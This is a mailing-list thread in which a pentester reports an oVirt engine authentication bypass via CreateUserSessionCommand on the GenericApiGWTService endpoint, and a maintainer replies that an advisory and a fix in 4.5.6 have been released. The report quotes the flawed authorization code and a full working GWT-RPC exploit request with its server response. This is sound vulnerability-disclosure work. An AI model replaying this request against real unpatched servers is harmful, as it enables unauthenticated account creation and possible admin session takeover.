Hi, thanks for reporting.
An advisory has been published:
https://github.com/oVirt/ovirt-engine/security/advisories/GHSA-5p2q-85hp-rvxg
and the fix has been released in ovirt-engine-4.5.6:
https://github.com/oVirt/ovirt-engine/releases/tag/ovirt-engine-4.5.6
Builds are on their way to the mirrors.
Il giorno lun 15 gen 2024 alle ore 10:09 Jirka Simon <ji...@vesim.cz>
ha scritto:
Hello ovirt comunity.
We had an internal pentest here and one finding is
*Ovirt-engine authentication bypass.*
Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz
<http://ovirtm.XXX.XXX.cz>, contains an authentication bypass. It is
possible to directly call the CreateUserSessionCommand using
runAction exposed by /ovirt-
engine/webadmin/GenericApiGWTService.
*This action explicitly enables everyone to call it:*
```/
@Override
protected boolean isUserAuthorizedToRunAction() {
return true;
}
/```
The behavior of this call differs based on the
ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:
```
/boolean externalSsoEnabled =
EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
dbUserDao.getByUsernameAndDomain(params.getPrincipalName(),
authzName) :
dbUserDao.getByExternalId(authzName,
params.getPrincipalId());/
```
If this option is enabled, usernames are used to locate users. If
it's disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.
If the specified user exists, a session is returned for the user.
If the specified user doesn't exist,
the user is created in the system. However, the user doesn't get
assigned any group membership
or rights, therefore the session creation fails because of the
missing Login right.
The attempt to modify the users table can be seen in the SQL error
message when attempting to
use a null value for the username (as the endpoint uses GWT, the
payload is mostly unreadable):
```
/POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1
Host: ovirtm.xxx.xxx.cz <http://ovirtm.xxx.xxx.cz>
14
Final Report: Results of penetration testing (internal, external,
Wi-Fi)
21 December 2023
Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45;
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D
Ovirt-Xsrf-Token:
4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869
7|0|23|https://ovirtm.xxx.xxx.cz/ovirt-
engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT
Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo
n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter
s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm
in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc
edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie
s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2
01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
4|22|0|1|0|1|23|2|0|0|0|
HTTP/1.1 200 OK
Date: Fri, 15 Dec 2023 09:42:35 GMT
Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k
mod_auth_gssapi/1.6.1
Expires: Thu, 14 Dec 2023 09:42:35 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly;
Max-Age=2147483647; Expires=Wed, 02-Jan-2092
12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK
Pragma: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
Content-Disposition: attachment
X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794
Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5
Connection: close
//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action
ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org
.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
or/2640515959","ERROR: null value in column \"username\" violates
not-null constraint\n Detail:
Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6,
firstName, lastName, internal-authz, null,
, email, , f, principalId, 2023-12-14 17:51:04.757747+01,
2023-12-15 10:42:35.125994+01, namespace,
firstName@internal-authz).\n Where: SQL statement \"UPDATE users\n
SET department \u003D
v_department,\n domain \u003D v_domain,\n email \u003D v_email,\n
name \u003D
v_name,\n note \u003D v_note,\n surname \u003D v_surname,\n
username \u003D
v_username,\n external_id \u003D v_external_id,\n namespace \u003D
v_namespace,\n
_update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D
v_external_id\n AND domain
\u003D v_domain\"\nPL/pgSQL function updateuserimpl(character
varying,character varying,character
varying,character varying,character varying,character
varying,uuid,character varying,text,character
varying) line 5 at SQL statement\nSQL statement \"SELECT
UpdateUserImpl(\n v_department,\n
v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n
v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function
updateuser(character
varying,character varying,character varying,character
varying,character varying,character
varying,uuid,character varying,boolean,text,character varying)
line 3 at PERFORM"],0,7]/
```
Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO
configuration was
set to false, so to create a session for the admin it would be
necessary to know the admin's user
externalId. However, as this is not the default configuration, it
is possible that a later
reinstallation could change the value. Still, it was possible to
create users in the system without
any authentication.
What is the best way to report this security issue?
Thank you
Jirka
_______________________________________________
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct:
https://www.ovirt.org/community/about/community-guidelines/
List Archives:
https://lists.ovirt.org/archives/list/users@ovirt.org/message/HG33VD56KZZQKCJDXIAB667J4HIHH2DQ/
--
Sandro Bonazzola
MANAGER, SOFTWARE ENGINEERING
Red Hat In-Vehicle Operating System
Red Hat EMEA <https://www.redhat.com/>
<https://www.redhat.com/>
*Red Hat respects your work life balance. Therefore there is no need
to answer this email out of your office hours.
*
*
*
_______________________________________________
Users mailing list --users@ovirt.org
To unsubscribe send an email tousers-le...@ovirt.org
Privacy Statement:https://www.ovirt.org/privacy-policy.html
oVirt Code of
Conduct:https://www.ovirt.org/community/about/community-guidelines/
List
Archives:https://lists.ovirt.org/archives/list/users@ovirt.org/message/OVIOCE6WUF4UAS2X26FPMPZC2KDVOTTS/
